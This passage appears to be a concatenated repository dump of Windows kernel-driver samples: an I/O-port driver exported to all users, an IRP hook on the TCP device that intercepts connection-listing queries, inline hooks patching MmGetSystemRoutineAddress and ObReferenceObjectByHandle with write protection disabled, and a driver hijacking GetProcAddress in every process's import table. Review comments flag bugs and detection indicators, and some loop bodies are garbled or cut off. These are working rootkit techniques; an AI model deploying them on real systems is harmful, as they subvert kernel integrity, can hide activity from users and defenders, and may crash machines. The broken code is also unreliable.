Create/Dispatch/Unload. NOTE(review): the device is created with no security descriptor and a DOS link is exported, so the IOCTL surface above is presumably reachable by any local user — confirm the default DACL applied to FILE_DEVICE_UNKNOWN. The failure returns that follow (continued on the next line) leak MyIOPM and, once IoCreateSymbolicLink fails, the device object; `a` and `b` are unused. */ NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 100 | { 101 | PDEVICE_OBJECT device; 102 | int a, b; 103 | NTSTATUS status; 104 | WCHAR NameBuffer[] = L"\\Device\\PortTalk"; 105 | WCHAR DosNameBuffer[] = L"\\DosDevices\\PortTalk"; 106 | UNICODE_STRING uniNameString, uniDosString; 107 | 108 | DbgPrint("PortTalk has loaded!\n"); 109 | 110 | MyIOPM = MmAllocateNonCachedMemory(sizeof(IOPM)); 111 | if (MyIOPM == NULL) 112 | { 113 | DbgPrint("MmAllocateNonCachedMemory error!\n"); 114 | return STATUS_INSUFFICIENT_RESOURCES; 115 | } 116 | 117 | RtlFillMemory(MyIOPM, sizeof(IOPM), 0xFF); 118 | DbgPrint("Memory Allocated at %x\n", MyIOPM); 119 | 120 | RtlInitUnicodeString(&uniNameString, NameBuffer); 121 | RtlInitUnicodeString(&uniDosString, 
DosNameBuffer); 122 | 123 | status = IoCreateDevice( 124 | driver, 125 | 0, 126 | &uniNameString, 127 | FILE_DEVICE_UNKNOWN, 128 | 0, 129 | FALSE, 130 | &device ); 131 | if (status != STATUS_SUCCESS) 132 | return status; 133 | 134 | status = IoCreateSymbolicLink(&uniDosString, &uniNameString); 135 | if (status != STATUS_SUCCESS) 136 | return status; 137 | 138 | driver->MajorFunction[IRP_MJ_CREATE] = Create; 139 | driver->MajorFunction[IRP_MJ_DEVICE_CONTROL] = Dispatch; 140 | driver->DriverUnload = Unload; 141 | 142 | return STATUS_SUCCESS; 143 | } 144 | -------------------------------------------------------------------------------- /IOMAP2/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IOMAP2/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=IOMAP2 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /IRPHook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | typedef unsigned short WCHAR, WORD; 4 | typedef unsigned long ULONG, DWORD; 5 | typedef unsigned char CHAR, BYTE; 6 | typedef unsigned long* PULONG; 7 | 8 | PFILE_OBJECT pFile = NULL; 9 | PDEVICE_OBJECT pDevTcp= NULL; 10 | PDRIVER_OBJECT pDrvTcp = NULL; 11 | 12 | typedef NTSTATUS (*FUNCTION)(IN PDEVICE_OBJECT, IN PIRP); 13 | 
FUNCTION old; 14 | 15 | #define CO_TL_ENTITY 0x400 16 | #define CL_TL_ENTITY 0x401 17 | #define IOCTL_TCP_QUERY 0x00120003 18 | 19 | typedef struct _TDIEntityID { 20 | ULONG tei_entity; 21 | ULONG tei_instance; 22 | } TDIEntityID; 23 | typedef struct _TDIObjectID { 24 | TDIEntityID toi_entity; 25 | ULONG toi_class; 26 | ULONG toi_type; 27 | ULONG toi_id; 28 | } TDIObjectID; 29 | 30 | typedef struct _REQINFO { 31 | PIO_COMPLETION_ROUTINE old; 32 | ULONG ReqType; 33 | } REQINFO, *PRQINFO; 34 | 35 | 36 | #define HTONS(a) ((((a) & 0xFF)<<8) + (((a) & 0xFF00)>>8)) 37 | typedef struct _CONNINFO101 { 38 | ULONG status; 39 | ULONG src_addr; 40 | WORD src_port; 41 | WORD u1; 42 | ULONG dst_addr; 43 | WORD dst_port; 44 | WORD u2; 45 | } CONNINFO101, *PCONNINFO101; 46 | typedef struct _CONNINFO102 { 47 | ULONG status; 48 | ULONG src_addr; 49 | WORD src_port; 50 | WORD u1; 51 | ULONG dst_addr; 52 | WORD dst_port; 53 | WORD u2; 54 | ULONG pid; 55 | } CONNINFO102, *PCONNINFO102; 56 | typedef struct _CONNINFO110 { 57 | ULONG status; 58 | ULONG src_addr; 59 | WORD src_port; 60 | WORD u1; 61 | ULONG dst_addr; 62 | WORD dst_port; 63 | WORD u2; 64 | ULONG pid; 65 | PVOID u3[35]; 66 | } CONNINFO110, *PCONNINFO110; 67 | 68 | 69 | NTSTATUS IoCompleteRoutine(IN PDEVICE_OBJECT device, 70 | IN PIRP pIrp, 71 | IN PVOID context) 72 | { 73 | PVOID outputBuffer; 74 | DWORD NumberOfOutput; 75 | PIO_COMPLETION_ROUTINE pCompRoutine; 76 | DWORD i; 77 | 78 | outputBuffer = pIrp->UserBuffer; 79 | pCompRoutine = ((REQINFO)context)->old; 80 | if (((REQINFO)context)->ReqType == 0x101) 81 | { 82 | NumberOfOutput = pIrp->IoStatus.Information / 83 | sizeof(CONNINFO101); 84 | for (i=0; iReqType == 0x102) 91 | { 92 | NumberOfOutput = pIrp->IoStatus.Information / 93 | sizeof(CONNINFO102); 94 | for (i=0; iReqType == 0x110) 101 | { 102 | NumberOfOutput = pIrp->IoStatus.Information / 103 | sizeof(CONNINFO110); 104 | for (i=0; iStackCount > 1) 112 | && (pCompRoutine != NULL)) 113 | { 114 | return 
pCompRoutine(device, pIrp, NULL); 115 | } 116 | else 117 | { 118 | return pIrp->IoStatus.Status; 119 | } 120 | } 121 | NTSTATUS MyFunc(IN PDEVICE_OBJECT device, IN PIRP pIrp) 122 | { 123 | PIO_STACK_LOCATION irpStack; 124 | TDIObjectID *inputBuffer; 125 | DWORD context; 126 | 127 | irpStack = IoGetCurrentIrpStackLocation(pIrp); 128 | switch (irpStack->MajorFunction) 129 | { 130 | case IRP_MJ_DEVICE_CONTROL: 131 | if ((irpStack->MinorFunction == 0) && 132 | (irpStack->Parameters.DeviceIoControl.IoControlCode == 133 | IOCTL_TCP_QUERY)) 134 | { 135 | inputBuffer = (TDIObjectID*) 136 | irpStack->Parameters.DeviceIoControl.Type3InputBuffer; 137 | if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY) 138 | { 139 | if ((inputBuffer->toi_id == 0x101) || 140 | (inputBuffer->toi_id == 0x102) || 141 | (inputBuffer->toi_id == 0x110)) 142 | { 143 | irpStack->Control = SL_INVOKE_ON_SUCCESS; 144 | irpStack->Context = (PIO_COMPLETION_ROUTINE) 145 | ExAllocatePool(NonPagedPool, sizeof(REQINFO)); 146 | ((REQINFO)irpStack->Context)->old = 147 | irpStack->CompletionRoutine; 148 | ((REQINFO)irpStack->Context)->ReqType = 149 | inputBuffer->toi_id; 150 | irpStack->CompletionRoutine = 151 | (PIO_COMPLETION_ROUTINE)IoCompleteRoutine; 152 | } 153 | } 154 | } 155 | break; 156 | default: 157 | break; 158 | } 159 | return old(device, pIrp); 160 | } 161 | 162 | 163 | NTSTATUS Hook() 164 | { 165 | NTSTATUS status; 166 | UNICODE_STRING usDevTcp; 167 | WCHAR szDevTcpBuffer[] = L"\\Device\\Tcp"; 168 | RtlInitUnicodeString( 169 | &usDevTcp, 170 | szDevTcpBuffer); 171 | 172 | status = IoGetDeviceObjectPointer( 173 | &usDevTcp, 174 | FILE_READ_DATA, 175 | &pFile, 176 | &pDevTcp); 177 | if (status != STATUS_SUCCESS) 178 | return status; 179 | 180 | pDrvTcp = pDevTcp->DriverObject; 181 | old = (FUNCTION)InterlockedExchange( 182 | (PULONG)&pDrvTcp->MajorFunction[IRP_MJ_DEVICE_CONTROL], 183 | (ULONG)MyFunc); 184 | 185 | return status; 186 | } 187 | 
-------------------------------------------------------------------------------- /IRPHook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IRPHook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=IRPHook 3 | TARGETPATH=obj 4 | TARGETTYPE= 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES= 14 | -------------------------------------------------------------------------------- /Inline Hook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | #define NEWENTRYOFFSET 8 4 | char old[10]; 5 | char outString[] = "Function: %ws\n"; 6 | 7 | __declspec(naked) MyMmGetSystemRoutineAddress() 8 | { 9 | __asm{ 10 | cli; 11 | push ebp; 12 | mov ebp,esp; 13 | sub esp,20h; 14 | mov eax, [ebp + 8] 15 | push eax 16 | mov eax, offset outString; 17 | push eax; 18 | mov eax, 80528e92h; 19 | call eax; 20 | pop eax; 21 | sti; 22 | _emit 0xEA; 23 | _emit 0xAA; 24 | _emit 0xAA; 25 | _emit 0xAA; 26 | _emit 0xAA; 27 | _emit 0x80; 28 | _emit 0x00; 29 | } 30 | } 31 | 32 | void Hook() 33 | { 34 | int i; 35 | UNICODE_STRING uniName; 36 | ULONG Address = 0, newEntry; 37 | unsigned char * realAddress; 38 | unsigned char * funcAddress; 39 | ULONG tempAddress; 40 | char temp[] = { 41 | 0xEA, 42 | 0xAA, 43 | 0xAA, 44 | 0xAA, 45 | 0xAA, 46 | 0x80, 47 | 0x00, 48 | 0x90 49 | }; 50 | 51 | RtlInitUnicodeString(&uniName, L"MmGetSystemRoutineAddress"); 52 | Address 
= (ULONG)MmGetSystemRoutineAddress(&uniName); 53 | if (Address == 0) 54 | { 55 | DbgPrint("Cannot find address!\n"); 56 | return; 57 | } 58 | realAddress = (unsigned char*)Address; 59 | newEntry = Address + NEWENTRYOFFSET; 60 | 61 | tempAddress = (ULONG)ExAllocatePool(NonPagedPool, 256); 62 | funcAddress = (unsigned char *)tempAddress; 63 | for (i =0; i<256; i++) 64 | { 65 | funcAddress[i] = 66 | ((unsigned char *)MyMmGetSystemRoutineAddress)[i]; 67 | } 68 | *((unsigned long *)(&temp[1])) = (unsigned long)funcAddress; 69 | for (i=0; i<200; i++) 70 | { 71 | if ( (funcAddress[i] == 0xAA) && 72 | (funcAddress[i+1] == 0xAA) && 73 | (funcAddress[i+2] == 0xAA) && 74 | (funcAddress[i+3] == 0xAA) ) 75 | { 76 | *(ULONG*)(&funcAddress[i]) = newEntry; 77 | break; 78 | } 79 | } 80 | for (i = 0; iDriverUnload = Unload; 114 | return STATUS_SUCCESS; 115 | } -------------------------------------------------------------------------------- /Inline Hook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. 
This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /Inline Hook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=inlinehook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /InlineHookObReferenced/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "windef.h" 3 | 4 | extern POBJECT_TYPE *PsProcessType; 5 | 6 | void InlineHookObreferenceObjectByHandle(); 7 | void Unhook(); 8 | 9 | char ProcessName[] = "notepad.exe"; 10 | 11 | int NewObReferenceObjectByHandle( 12 | HANDLE Handle, 13 | ACCESS_MASK DesiredAccess, 14 | POBJECT_TYPE ObjectType, 15 | KPROCESSOR_MODE AccessMode, 16 | PVOID *Object, 17 | POBJECT_HANDLE_INFORMATION HandleInformation 18 | ); 19 | 20 | __declspec(naked) NewFunction( 21 | IN HANDLE Handle, 22 | IN ACCESS_MASK DesiredAccess, 23 | IN POBJECT_TYPE ObjectType OPTIONAL, 24 | IN KPROCESSOR_MODE AccessMode, 25 | OUT PVOID *Object, 26 | OUT POBJECT_HANDLE_INFORMATION HandleInformation OPTIONAL 27 | ) 28 | { 29 | _asm 30 | { 31 | mov edi,edi; 32 | push ebp; 33 | mov ebp,esp; 34 | push [ebp+0x1c]; 35 | push [ebp+0x18]; 36 | push [ebp+0x14]; 37 | push [ebp+0x10]; 38 | push [ebp+0xc]; 39 | push [ebp+8]; 40 | call NewObReferenceObjectByHandle; 41 | cmp eax,1; 42 | jnz end; 43 | mov [ebp+8],-1; 44 | end: 45 | mov eax,ObReferenceObjectByHandle; 46 | add eax,5; 47 | jmp eax; 48 | } 49 | } 50 | 51 | int NewObReferenceObjectByHandle( 52 | HANDLE Handle, 53 | ACCESS_MASK 
DesiredAccess, 54 | POBJECT_TYPE ObjectType, 55 | KPROCESSOR_MODE AccessMode, 56 | PVOID *Object, 57 | POBJECT_HANDLE_INFORMATION HandleInformation 58 | ) 59 | { /* Body of NewObReferenceObjectByHandle (its signature starts on the previous line). Called from the naked NewFunction stub with the original arguments; returns 1 when ObjectType is the process type and the referenced EPROCESS has ProcessName at offset 0x174, else 0. For process objects it raises to DISPATCH_LEVEL, clears CR0.WP, restores the 5 original prologue bytes (Code), calls the real function, compares the name, then re-writes the jmp (JmpCode) and restores WP. NOTE(review): the status of ObReferenceObjectByHandle is not checked, so on failure `Process` is uninitialized when dereferenced, and the reference taken on success is never released (no ObDereferenceObject). 0x174 is a build-specific EPROCESS offset — presumably ImageFileName on the XP build this targeted. cli and the CR0 change only affect the current CPU, so another CPU may execute the function while its first 5 bytes are being rewritten. */ 60 | PEPROCESS Process; 61 | KIRQL oldIrql; 62 | int JmpOffset, ans = 0; 63 | unsigned char JmpCode[5] = { 0xE9, 0xAA, 0xAA, 0xAA, 0xAA}; /* E9 rel32; the placeholder bytes are filled with JmpOffset below. */ 64 | unsigned char Code[5] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC }; /* Assumed original prologue: mov edi,edi; push ebp; mov ebp,esp. */ 65 | 66 | if (ObjectType == *PsProcessType) 67 | { 68 | oldIrql = KeRaiseIrqlToDpcLevel(); 69 | /* Clear CR0 bit 16 (WP) so kernel text can be written. */ __asm 70 | { 71 | cli; 72 | mov eax, cr0; 73 | and eax, not 10000H; 74 | mov cr0, eax; 75 | } 76 | RtlCopyMemory(ObReferenceObjectByHandle, Code, 5); 77 | ObReferenceObjectByHandle(Handle, DesiredAccess, 78 | ObjectType, AccessMode, &Process, NULL); 79 | if (_stricmp((char*)((char*)Process+0x174), ProcessName) == 0) 80 | { 81 | ans = 1; 82 | } 83 | JmpOffset = (char*)NewFunction - (char*)ObReferenceObjectByHandle - 5; 84 | RtlCopyMemory(JmpCode + 1, &JmpOffset, 4); 85 | RtlCopyMemory(ObReferenceObjectByHandle, JmpCode, 5); 86 | /* Restore WP and interrupts. */ __asm 87 | { 88 | mov eax, cr0; 89 | or eax, 10000H; 90 | mov cr0, eax; 91 | sti; 92 | } 93 | KeLowerIrql(oldIrql); 94 | } 95 | return ans; 96 | } 97 | 98 | /* Installs the inline hook: computes a rel32 jmp from ObReferenceObjectByHandle to NewFunction, disables write protection and overwrites the function's first 5 bytes. NOTE(review): the original bytes are never saved; Unload() and NewObReferenceObjectByHandle rely on the hard-coded prologue 8B FF 55 8B EC being correct for this kernel build. The 5-byte RtlCopyMemory is not atomic with respect to other CPUs. From a defender's side this is exactly the kernel .text modification that integrity checks catch by comparing the in-memory prologue with the on-disk image. */ void Hook() 99 | { 100 | int JmpOffset; 101 | unsigned char JmpCode[5] = { 0xE9, 0xAA, 0xAA, 0xAA, 0xAA }; 102 | KIRQL oldIrql; 103 | 104 | JmpOffset = (char*)NewFunction - (char*)ObReferenceObjectByHandle - 5; 105 | RtlCopyMemory( JmpCode+1, &JmpOffset, 4); 106 | oldIrql = KeRaiseIrqlToDpcLevel(); 107 | /* Clear CR0.WP. */ __asm 108 | { 109 | cli; 110 | mov eax, cr0; 111 | and eax, not 10000H; 112 | mov cr0, eax; 113 | } 114 | RtlCopyMemory(ObReferenceObjectByHandle, JmpCode, 5); 115 | /* Restore CR0.WP and interrupts. */ __asm 116 | { 117 | mov eax, cr0; 118 | or eax, 10000h; 119 | mov cr0, eax; 120 | sti; 121 | } 122 | KeLowerIrql(oldIrql); 123 | } 124 | 125 | /* Driver unload: waits (relative 100 ns units, -5000000 = 0.5 s; presumably to let calls already inside the hook finish), then writes the assumed original prologue back under the same CR0.WP/IRQL sequence as Hook(). */ VOID Unload(PDRIVER_OBJECT DriverObject) 126 | { 127 | KIRQL oldIrql; 128 | LARGE_INTEGER Delay; 129 | unsigned char Code[5]={0x8b,0xff,0x55,0x8b,0xec}; 130 | 131 | Delay.QuadPart = -5000000; 132 | KeDelayExecutionThread(KernelMode, 
TRUE, &Delay); 133 | oldIrql = KeRaiseIrqlToDpcLevel(); 134 | __asm 135 | { 136 | cli; 137 | mov eax,cr0; 138 | and eax,not 10000H; 139 | mov cr0,eax; 140 | } 141 | RtlCopyMemory(ObReferenceObjectByHandle,Code,5); 142 | __asm 143 | { 144 | mov eax, cr0; 145 | or eax, 10000H 146 | mov cr0, eax 147 | sti; 148 | } 149 | KeLowerIrql(oldIrql); 150 | } 151 | 152 | /* Registers Unload, then installs the hook unconditionally; Hook() has no failure path to report. */ NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 153 | { 154 | driver->DriverUnload = Unload; 155 | Hook(); 156 | return STATUS_SUCCESS; 157 | } 158 | -------------------------------------------------------------------------------- /InlineHookObReferenced/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /InlineHookObReferenced/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=InlineHookObReferenced 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /KernelAndUserHook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "pe.h" 3 | #include "ntifs.h" 4 | 5 | /* Hard-coded kernel/user addresses of the page the 8-byte stub is written to and later executed from (presumably the two mappings of the shared user data page on 32-bit XP-era builds — confirm). temp is the stub template: nop; mov eax, imm32; jmp eax, with the imm32 at temp+2 patched in Hook(). `s` is unused in the visible code. */ DWORD UsersharedMemory = 0x7FFE0800; 6 | DWORD KerlsharedMemory = 0xFFDF0800; 7 | 8 | char temp[] = { 9 | 0x90, 10 | 0xb8, 0xaa,0xaa, 0xaa, 0xaa, 11 | 0xff, 0xe0 12 | }; 13 | char s[256]; 14 | 15 | NTSTATUS Hook(PIMAGE_DOS_HEADER base, HANDLE dwProcessID) 
{ /* Body of Hook() (signature on the previous line). Walks the import table of the PE image at `base` — must run while attached to the owning process, which HookStart() guarantees — and for the kernel32.dll!GetProcAddress IAT slot: (1) writes the 8-byte stub at KerlsharedMemory with its imm32 set to the slot's current contents, i.e. the real GetProcAddress, and (2) repoints the slot to UsersharedMemory, the user-mode alias of the same page. The slot is written through an MDL mapping, presumably because the IAT page is not directly writable. dwProcessID is unused. NOTE(review): e_magic and e_lfanew are not validated before pNTHeader is dereferenced, and an import directory RVA of 0 would make pIID alias the image base. MmBuildMdlForNonPagedPool is documented for non-paged pool only and MmCreateMdl is obsolete (IoAllocateMdl), so the MDL sequence is outside the documented contract. An IAT entry that points outside every loaded module is the indicator a defender would look for here. */ 17 | PIMAGE_DOS_HEADER dosHeader; 18 | PIMAGE_NT_HEADERS pNTHeader; 19 | PIMAGE_IMPORT_DESCRIPTOR pIID; 20 | PIMAGE_IMPORT_BY_NAME pImportByName; 21 | DWORD RVA; 22 | PDWORD pIAT, pINT; 23 | 24 | int count, index; 25 | char *dllName = NULL; 26 | char *dllTarget = "kernel32.dll"; 27 | char *funcTarget = "GetProcAddress"; 28 | PMDL MyMDL; 29 | PDWORD MappedTable; 30 | 31 | dosHeader = base; 32 | pNTHeader = (PIMAGE_NT_HEADERS)(dosHeader->e_lfanew + (DWORD)base); 33 | 34 | if (pNTHeader->Signature != IMAGE_NT_SIGNATURE) 35 | return STATUS_INVALID_IMAGE_FORMAT; 36 | 37 | RVA = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; 38 | pIID = (PIMAGE_IMPORT_DESCRIPTOR)(RVA + (DWORD)base); 39 | 40 | /* One descriptor per imported DLL, terminated by an all-zero entry. */ for (count = 0; pIID[count].Characteristics!=0; count++) 41 | { 42 | dllName = (char *)(pIID[count].Name + (DWORD)base); 43 | pIAT = (PDWORD)((DWORD)base + (DWORD)pIID[count].FirstThunk); 44 | pINT = (PDWORD)((DWORD)base + (DWORD)pIID[count].OriginalFirstThunk); 45 | /* Walk the bound IAT in step with the name table (INT); ordinal imports carry no name and are skipped. */ for (index=0; pIAT[index]!=0; index++) 46 | { 47 | if ((pINT[index] & IMAGE_ORDINAL_FLAG) != IMAGE_ORDINAL_FLAG) 48 | { 49 | pImportByName = (PIMAGE_IMPORT_BY_NAME)(pINT[index] + (DWORD)base); 50 | if ((_stricmp(dllName, dllTarget) == 0) && 51 | (_stricmp(pImportByName->Name, funcTarget) == 0)) 52 | { 53 | MyMDL = MmCreateMdl(NULL, &pIAT[index], 4); 54 | if (!MyMDL) return STATUS_UNSUCCESSFUL; 55 | MmBuildMdlForNonPagedPool(MyMDL); 56 | MyMDL->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA; 57 | MappedTable = MmMapLockedPages(MyMDL, KernelMode); 58 | /* Stub template, then the current IAT value (real GetProcAddress) as the mov eax operand at +2. */ RtlCopyMemory((PVOID)KerlsharedMemory, temp, 8); 59 | RtlCopyMemory((PVOID)(KerlsharedMemory+2), (PVOID)&pIAT[index], 4); 60 | *MappedTable = UsersharedMemory; 61 | MmUnmapLockedPages(MappedTable,MyMDL); 62 | IoFreeMdl(MyMDL); 63 | } 64 | } 65 | } 66 | } 67 | return STATUS_SUCCESS; 68 | } 69 | 70 | /* Resolves dwProcessID to its EPROCESS, reads the PEB pointer from EPROCESS at PEBOFFSET (hard-coded in pe.h), attaches to the process and walks InLoadOrderModuleList until the first module whose FullDllName contains ".exe", then hooks that image. NOTE(review): the PsLookupProcessByProcessId status is ignored (pEProcess is uninitialized on failure) and the reference is never released; wcsstr assumes the UNICODE_STRING buffer is NUL-terminated; the do/while compares against the first entry rather than the list head, so on wrap-around the head itself would be read as an LDR_MODULE. The local `temp` shadows the global stub array of the same name; pCurrentList/pTempList are unused. */ NTSTATUS HookStart(HANDLE dwProcessID) 71 | { 72 | ULONG pEProcess; 73 | PLIST_ENTRY pCurrentList = NULL, pTempList = NULL, 
pLoadOrderModuleList, list; 75 | PPEB pPeb = NULL; 76 | ULONG hModule, temp; 77 | PsLookupProcessByProcessId(dwProcessID,(PEPROCESS*)&pEProcess); 78 | pPeb = (PPEB)(*(PULONG)(pEProcess + PEBOFFSET)); 79 | if(pPeb != NULL) 80 | { 81 | KeAttachProcess((PRKPROCESS)pEProcess); 82 | pLoadOrderModuleList = pPeb->LoaderData->InLoadOrderModuleList.Flink; 83 | list = pLoadOrderModuleList; 84 | do 85 | { 86 | UNICODE_STRING pstrTemp = ((PLDR_MODULE)list)->FullDllName; 87 | DbgPrint("module name = %ws\n\n\n\n",pstrTemp.Buffer); 88 | if(wcsstr(pstrTemp.Buffer,L".exe") != NULL) 89 | { 90 | hModule = (ULONG)((PLDR_MODULE)list)->BaseAddress; 91 | temp = *(PULONG)hModule; /* Touches the image header; the value is not used afterwards. */ 92 | DbgPrint("Find Module baseAaddress = %x\n\n\n",hModule); 93 | Hook((PIMAGE_DOS_HEADER)hModule,dwProcessID); 94 | break; 95 | } 96 | list = list->Flink; 97 | } while(list != pLoadOrderModuleList); 98 | KeDetachProcess(); 99 | } 100 | return STATUS_SUCCESS; 101 | } 102 | 103 | /* Load-image notify callback: invoked for every image mapped in any process; when the full image name equals \WINDOWS\system32\kernel32.dll (case-sensitive compare, FALSE) it hooks the process identified by hProcess (a process id under the notify-routine contract). NOTE(review): a kernel32 loaded from another path or with different casing is not matched. */ void MyFunc(IN PUNICODE_STRING dllName, 104 | IN HANDLE hProcess, 105 | IN PIMAGE_INFO pImageInfo) 106 | { 107 | UNICODE_STRING targetDll; 108 | RtlInitUnicodeString(&targetDll, L"\\WINDOWS\\system32\\kernel32.dll"); 109 | if (RtlCompareUnicodeString(dllName, &targetDll, FALSE) == 0) 110 | { 111 | DbgPrint(" imageInfo->ImageBase:%x ProcessId : %d\n", pImageInfo->ImageBase, hProcess); 112 | HookStart(hProcess); 113 | } 114 | } 115 | 116 | /* Driver unload. NOTE(review): the load-image notify routine registered in DriverEntry is never removed (PsRemoveLoadImageNotifyRoutine), so after unload the kernel would call into freed driver memory; the IAT patches and the stub in the shared page are also left in place. */ void Unload(PDRIVER_OBJECT driver) 117 | { 118 | 119 | DbgPrint("Unload\n"); 120 | } 121 | 122 | /* Registers Unload and the load-image callback; the return status of PsSetLoadImageNotifyRoutine is not checked. */ NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 123 | { 124 | DbgPrint("DriverEntry\n"); 125 | driver->DriverUnload = Unload; 126 | PsSetLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)MyFunc); 127 | return STATUS_SUCCESS; 128 | } 129 | 130 | -------------------------------------------------------------------------------- /KernelAndUserHook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. 
if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /KernelAndUserHook/pe.h: -------------------------------------------------------------------------------- 1 | #ifndef _PE_H 2 | #define _PE_H 3 | 4 | typedef unsigned int DWORD; 5 | typedef unsigned char BYTE; 6 | typedef unsigned short WORD; 7 | typedef unsigned int* PDWORD; 8 | typedef unsigned char* PBYTE; 9 | typedef unsigned short* PWORD; 10 | 11 | #define IMAGE_DOS_SIGNATURE 0x5A4D // MZ 12 | #define IMAGE_OS2_SIGNATURE 0x454E // NE 13 | #define IMAGE_OS2_SIGNATURE_LE 0x454C // LE 14 | #define IMAGE_VXD_SIGNATURE 0x454C // LE 15 | #define IMAGE_NT_SIGNATURE 0x00004550 // PE00 16 | #define IMAGE_ORDINAL_FLAG 0x80000000 17 | 18 | typedef struct _IMAGE_IMPORT_BY_NAME { 19 | WORD Hint; 20 | BYTE Name[1]; 21 | } IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME; 22 | 23 | 24 | typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11 25 | ULONG Reserved[2]; 26 | PVOID Base; 27 | ULONG Size; 28 | ULONG Flags; 29 | USHORT Index; 30 | USHORT Unknown; 31 | USHORT LoadCount; 32 | USHORT ModuleNameOffset; 33 | CHAR ImageName[256]; 34 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 35 | 36 | 37 | typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header 38 | WORD e_magic; // Magic number 39 | WORD e_cblp; // Bytes on last page of file 40 | WORD e_cp; // Pages in file 41 | WORD e_crlc; // Relocations 42 | WORD e_cparhdr; // Size of header in paragraphs 43 | WORD e_minalloc; // Minimum extra paragraphs needed 44 | WORD e_maxalloc; // Maximum extra paragraphs needed 45 | WORD e_ss; // Initial (relative) SS value 46 | WORD e_sp; // Initial SP value 47 | WORD e_csum; // Checksum 48 | WORD e_ip; // Initial IP value 49 | WORD e_cs; // Initial (relative) CS 
value 50 | WORD e_lfarlc; // File address of relocation table 51 | WORD e_ovno; // Overlay number 52 | WORD e_res[4]; // Reserved words 53 | WORD e_oemid; // OEM identifier (for e_oeminfo) 54 | WORD e_oeminfo; // OEM information; e_oemid specific 55 | WORD e_res2[10]; // Reserved words 56 | LONG e_lfanew; // File address of new exe header 57 | } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; 58 | 59 | 60 | typedef struct _IMAGE_DATA_DIRECTORY { 61 | DWORD VirtualAddress; 62 | DWORD Size; 63 | } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; 64 | #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16 65 | 66 | typedef struct _IMAGE_OPTIONAL_HEADER { 67 | // 68 | // Standard fields. 69 | // 70 | 71 | WORD Magic; 72 | BYTE MajorLinkerVersion; 73 | BYTE MinorLinkerVersion; 74 | DWORD SizeOfCode; 75 | DWORD SizeOfInitializedData; 76 | DWORD SizeOfUninitializedData; 77 | DWORD AddressOfEntryPoint; 78 | DWORD BaseOfCode; 79 | DWORD BaseOfData; 80 | 